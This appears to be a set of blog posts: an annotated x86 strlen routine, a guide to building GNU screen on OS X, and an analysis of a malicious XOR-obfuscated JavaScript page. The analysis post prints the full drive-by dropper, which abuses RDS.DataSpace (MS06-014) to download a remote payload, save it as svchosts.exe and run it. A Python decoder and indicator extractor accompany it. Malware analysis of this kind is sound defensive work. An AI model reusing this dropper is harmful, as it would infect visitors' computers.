Inline strlen function in assembly
I know the strlen function in assembly has been covered on the internet before, but I figured I'd cover it again, just in case someone like me is searching Google for it.
Here's the code:
00404334 sub_404334 proc near
00404334 push edi
00404335 push eax
00404336 push ecx
00404337 mov edi, edx
00404339 xor eax, eax
0040433B repne scasb
0040433D jnz short loc_404341
0040433F not ecx
00404341 loc_404341:
00404341 pop eax
00404342 add ecx, eax
00404344 pop eax
00404345 pop edi
00404346 jmp sub_4041BC
00404346 sub_404334 endp
The inputs to this function come in edx and ecx: edx holds a pointer to our string (in this example the string is the location of the Windows directory, so let's say it's "C:\Windows") and ecx holds the maximum number of bytes to scan, 256 in this example. This matters because ecx is used as a countdown while the string is scanned. Let's go line-by-line:
00404334 push edi
00404335 push eax
00404336 push ecx
These 3 lines just save the registers to the stack so they aren't clobbered, standard stuff. Note the order: ecx is pushed last, so it is the first value popped back off below.
00404337 mov edi, edx
00404339 xor eax, eax
edx (which is an LPCSTR to "C:\Windows") is moved into edi, because scasb always scans at [edi] (you'll see why in a second). Eax is XOR'd with itself to zero it. The next instruction compares each byte of the string with al, so essentially it's searching for the NUL terminator '\0'.
0040433B repne scasb
This instruction scans from the address in edi, comparing each byte of the string to whatever is in al (which is '\0' or NUL right now). For every byte it compares it advances edi (the direction flag is assumed clear) and decrements ecx. repne means repeat-while-not-equal: if the byte does not match, it moves on to the next one, and it stops when a byte equals al or when ecx reaches zero. The byte that finally matches is consumed and counted too. In our example "C:\Windows" (terminated by NUL, like a good string should be) is 10 characters plus the terminator, so 11 bytes are scanned and ecx decreases from 256 to 245 (C – 255, : – 254, \ – 253, W – 252, i – 251, n – 250, d – 249, o – 248, w – 247, s – 246, \0 – 245).
0040433D jnz short loc_404341
The jump is taken if the zero flag is clear, i.e. the count ran out (ecx reached 0) without a NUL byte being found. In that case control goes to 0x404341 and the not below is skipped. In our example the NUL was found, so the jump is not taken.
0040433F not ecx
Flip all the bits in ecx. In two's complement, not x is -x - 1, so this does not quite make ecx = -ecx: the extra -1 is exactly what cancels out the NUL byte that was counted during the scan. In our example ecx becomes not 245 = -246 (0xFFFFFF0A). Note that if the count ran out without finding a NUL (ecx = 0), this instruction is skipped by the jump in the previous instruction, and the function ends up returning the maximum length instead (see below).
00404341 loc_404341:
00404341 pop eax
00404342 add ecx, eax
The starting value of ecx (256, remember?) is popped back into eax. Eax is then added to ecx and the result is stored in ecx. Therefore:
eax = 256
ecx = ecx + eax
ecx = -246 + 256
ecx = 10
The length of the string now resides in ecx (had the jump been taken, ecx would have been 0 here and the result 256, the limit). We can restore the original registers and jump away in the ending instructions:
00404344 pop eax
00404345 pop edi
00404346 jmp sub_4041BC
And that is one way to get the length of a string in assembly. One caveat worth keeping in mind: repne scasb reads up to ecx bytes regardless of how big the buffer really is, so the limit passed in ecx must not exceed the allocation, and a result equal to the limit means no terminator was found within it rather than a string of exactly that length.
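As an added example (my own Python model, not code from the original post), here is the routine reproduced step by step at the register level, with the intermediate values exposed so the arithmetic above can be checked: 256 - 11 = 245 after the scan, not 245 = 0xFFFFFF0A after the not, and 0xFFFFFF0A + 256 = 10 after the add. It assumes, as the routine does, that the direction flag is clear, and it turns the over-read the real code would perform on an unterminated buffer into an explicit error:

```python
MASK32 = 0xFFFFFFFF  # registers are 32 bits wide; every ecx update is reduced mod 2**32


def scasb_strlen_trace(buf: bytes, ecx_in: int) -> dict:
    """Model of sub_404334: edx -> buf, ecx -> ecx_in (maximum bytes to scan).

    Returns the intermediate register values so each step of the arithmetic
    can be checked, not just the final length.
    """
    al = 0                      # xor eax, eax: we are scanning for the NUL byte
    edi = 0                     # mov edi, edx: scasb always reads at [edi]
    ecx = ecx_in & MASK32
    zf = 0                      # flag state left behind by repne scasb

    # repne scasb: while ecx != 0 { zf = ([edi] == al); edi += 1; ecx -= 1; if zf: break }
    # The matching byte is consumed too, so ecx is decremented for the NUL as well.
    # DF is assumed clear (edi increments), as the routine relies on.
    while ecx != 0:
        if edi >= len(buf):
            # The real routine has no idea how big the buffer is: it keeps
            # reading until ecx runs out, so this would be an out-of-bounds read.
            raise ValueError("scan ran past the end of the buffer (over-read)")
        zf = int(buf[edi] == al)
        edi += 1
        ecx = (ecx - 1) & MASK32
        if zf:
            break
    ecx_after_scan = ecx

    # jnz short loc_404341: ZF clear means the count ran out with no NUL found,
    # and the NOT is skipped.
    if zf:
        ecx = ~ecx & MASK32     # not ecx == -ecx - 1; the -1 cancels the counted NUL
    ecx_after_not = ecx

    # pop eax ; add ecx, eax: eax holds the original count, and the 32-bit
    # wraparound turns the "negative" ecx plus the limit into the length.
    length = (ecx + ecx_in) & MASK32
    return {
        "ecx_after_scan": ecx_after_scan,
        "zf": zf,
        "ecx_after_not": ecx_after_not,
        "length": length,
    }


def bounded_strlen(buf: bytes, limit: int) -> int:
    """Just the result the routine leaves in ecx."""
    return scasb_strlen_trace(buf, limit)["length"]


if __name__ == "__main__":
    t = scasb_strlen_trace(b"C:\\Windows\0", 256)
    print(f"after scan: ecx={t['ecx_after_scan']} zf={t['zf']}")
    print(f"after not:  ecx=0x{t['ecx_after_not']:08X} ({t['ecx_after_not'] - (1 << 32)})")
    print(f"length:     {t['length']}")
    # No NUL within the limit: the jnz is taken and the limit itself comes back.
    print("unterminated:", bounded_strlen(b"A" * 8, 8))
```

Running it prints 245, 0xFFFFFF0A (-246) and 10 for "C:\Windows", and 8 for an 8-byte buffer of 'A's scanned with a limit of 8, which is the case where the caller cannot tell "no terminator" apart from "string is exactly as long as the limit".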
Compiling screen from CVS on OSX for vertical split.
Screen is an amazing tool. The latest version from CVS adds a great feature: you can now split the screen vertically (previously you could only split horizontally), which is extremely nice if you have a widescreen monitor. The only problem is that the patch for this feature isn't yet included in MacPorts or Fink.
Here’s how to fetch it from source, patch it and build it yourself on OSX (tested on 10.5.3). First we need to check out the source:
shell> cvs -z3 -d:pserver:anonymous@cvs.savannah.gnu.org:/sources/screen co screen
Next, we need to manually apply the patches from MacPorts (this assumes you've used MacPorts before, so the ports tree is present under /opt/local). First change into the screen source directory and apply the following 3 patches:
shell> cd screen/src
shell> patch < /opt/local/var/macports/sources/rsync.macports.org/release/ports/sysutils/screen/files/patch-maxargs
shell> patch < /opt/local/var/macports/sources/rsync.macports.org/release/ports/sysutils/screen/files/patch-windowsize
shell> patch < /opt/local/var/macports/sources/rsync.macports.org/release/ports/sysutils/screen/files/patch-pty.c
Now, configure using the same method as the macports:
shell> ./configure --enable-locale --enable-telnet --enable-colors256 --enable-rxvt_osc
From there, you should be able to do a make and make install to get your screen up and running. Vertical-split is bound to ctrl+a – | (control-a and pipe) (substitute whatever your bind key is for ctrl+a). Then you can use ctrl+a – :resize <x> to resize the window, where <x> is x%, -x, +x or x. Here’s a screenshot of it in action:
Quick javascript de-obfuscation with python
Scholar was kind enough to allow me to post his/her obfuscated javascript. Here’s a quick rundown. The page was originally this:
<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>
str = "qndy`mh)(:gtobuhno!qndy`mh)(!zw`s!doeds!<!enbtldou/bsd`udDm
dldou)&nckdbu&(:doeds/rdu@uushctud)&he&-&doeds&(:doeds/rdu@uushc
tud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892
@,1&*#1B#*&15G&*#B38#*&D27&(:usx!zw`s!`rp!<!doeds/Bsd`udNckdbu)
&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(:w`s!`rr!<
!doeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-
&&(:w`s!`rru!<!doeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&
-&&(:usx!z!`rru/uxqd!<!0:`rp/nqdo)&F&*#D#*&U&-&iuuq;..vn
smebihodrdvshudsr/bnl..mn`e/qiq&-g`mrd(:`rp/rdoe)(:!`rr
u/nqdo)(:`rru/Vshud)`rp/sdrqnordCnex(:w`s!hlx`!<!&/..//..r
wbinrur/dyd&:`rru/R`wdUnGhmd)hlx`-3(:`rru/Bm
nrd)(:|!b`ubi)d(!z|usx!z!`rr/ridmmdydbtud)hlx`(:!|!b`ubi
)d(!z||b`ubi)d(z||";
str2 = "";
for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>
str2 now contains the de-obfuscated javascript, which after inserting line breaks and collapsing the split-up string literals (for example 'c'+'l'+"sid:B"+… becomes the single 'clsid:…' string) looks something like this:
poexali();
function poexali() {
var ender = document.createElement('object');
ender.setAttribute('id','ender');
ender.setAttribute('classid','clsid:BD96C556-65A3-11D0-983A-00C04FC29E36');
try {
var asq = ender.CreateObject('msxml2.XMLHTTP','');
var ass = ender.CreateObject("Shell.Application",'');
var asst = ender.CreateObject('adodb.stream','');
try {
asst.type = 1;
asq.open('GET','http://worldchinesewriters.com//load.php',false);
asq.send();
asst.open();
asst.Write(asq.responseBody);
var imya = './/..//svchosts.exe';
asst.SaveToFile(imya,2);
asst.Close();
} catch(e) {}
try {
ass.shellexecute(imya);
} catch(e) {}
}catch(e){}
}
Which, as Scholar pointed out in his/her original email, attempts to download hxxp://worldchinesewriters.com/load.php, save it to the local file "svchosts.exe", and then execute that file. The classid it instantiates, BD96C556-65A3-11D0-983A-00C04FC29E36, is the RDS.DataSpace ActiveX control; its CreateObject method is what lets the page conjure up XMLHTTP, Shell.Application and ADODB.Stream from script, the well-known MS06-014 technique. The splitting of the string literals ('m'+"sx"+'ml2'+…) is there to keep those object names out of signature-based scanners.
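Here is the Python side that the title promises, as an added example (my code, not part of the original post). The obfuscated string is the one from the page with its wrapped lines joined back together. The decoder goes beyond the fixed key of 1 used by this sample: it tries every single-byte XOR key and picks the one whose output looks most like JavaScript, collapses the split string literals the way the cleaned-up listing above does, and then pulls out the indicators (URL, dropped file name, classid) a responder actually wants from the result:

```python
import re

# The str = "..." literal from the page (constructed from the original post, wrapped
# lines joined; nothing added or removed).
OBFUSCATED = (
    "qndy`mh)(:gtobuhno!qndy`mh)(!zw`s!doeds!<!enbtldou/bsd`udDm"
    "dldou)&nckdbu&(:doeds/rdu@uushctud)&he&-&doeds&(:doeds/rdu@uushc"
    "tud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892"
    "@,1&*#1B#*&15G&*#B38#*&D27&(:usx!zw`s!`rp!<!doeds/Bsd`udNckdbu)"
    "&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(:w`s!`rr!<"
    "!doeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-"
    "&&(:w`s!`rru!<!doeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&"
    "-&&(:usx!z!`rru/uxqd!<!0:`rp/nqdo)&F&*#D#*&U&-&iuuq;..vn"
    "smebihodrdvshudsr/bnl..mn`e/qiq&-g`mrd(:`rp/rdoe)(:!`rr"
    "u/nqdo)(:`rru/Vshud)`rp/sdrqnordCnex(:w`s!hlx`!<!&/..//..r"
    "wbinrur/dyd&:`rru/R`wdUnGhmd)hlx`-3(:`rru/Bm"
    "nrd)(:|!b`ubi)d(!z|usx!z!`rr/ridmmdydbtud)hlx`(:!|!b`ubi"
    ")d(!z||b`ubi)d(z||"
)

# Tokens that a decoded dropper is very likely to contain; used to rank candidate keys.
JS_MARKERS = ("function", "var ", "try", "catch", "eval", "document", "CreateObject", "http")


def xor_decode(text: str, key: int) -> str:
    """Undo the loader's per-character XOR (String.fromCharCode(c ^ key))."""
    return "".join(chr(ord(c) ^ key) for c in text)


def score_plaintext(candidate: str) -> int:
    """Higher is more JavaScript-like; anything with control characters is rejected."""
    if not candidate.isprintable():
        return -1
    return sum(candidate.count(marker) for marker in JS_MARKERS)


def find_xor_key(text: str) -> int:
    """Brute-force the single-byte key (0-255) instead of trusting the loader's loop."""
    return max(range(256), key=lambda k: score_plaintext(xor_decode(text, k)))


# 'a'+"b" : two adjacent quoted literals joined by +. No escapes appear in this sample.
_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def collapse_concats(js: str) -> str:
    """Merge split literal chains like 'c'+'l'+"sid:B" until a fixed point is reached."""
    while True:
        merged = _CONCAT.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", js)
        if merged == js:
            return js
        js = merged


def extract_iocs(js: str) -> dict:
    """Pull the network and host indicators out of the cleaned-up script."""
    return {
        "urls": re.findall(r"https?://[^\s'\"]+", js),
        "files": re.findall(r"[\w-]+\.exe", js),
        "classids": re.findall(r"clsid:([0-9A-Fa-f-]{36})", js),
    }


def deobfuscate(text: str = OBFUSCATED) -> str:
    """Key recovery, decode and literal collapsing in one step."""
    return collapse_concats(xor_decode(text, find_xor_key(text)))


if __name__ == "__main__":
    js = deobfuscate()
    print("key:", find_xor_key(OBFUSCATED))
    print(js.replace(";", ";\n"))       # rough line breaks, like the listing above
    print(extract_iocs(js))
```

The marker scoring is deliberately crude: a real single-byte XOR obfuscation leaks the key through every common character, so any key other than the right one produces text with no JavaScript keywords at all, and the printability check throws out the keys that land in the control-character range. The literal collapsing is only safe on scripts like this one, where the literals contain no quotes or backslash escapes.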
Super-quick post, since lately I seem to be a tad verbose. What "svchosts.exe" does is left as an exercise for the reader.

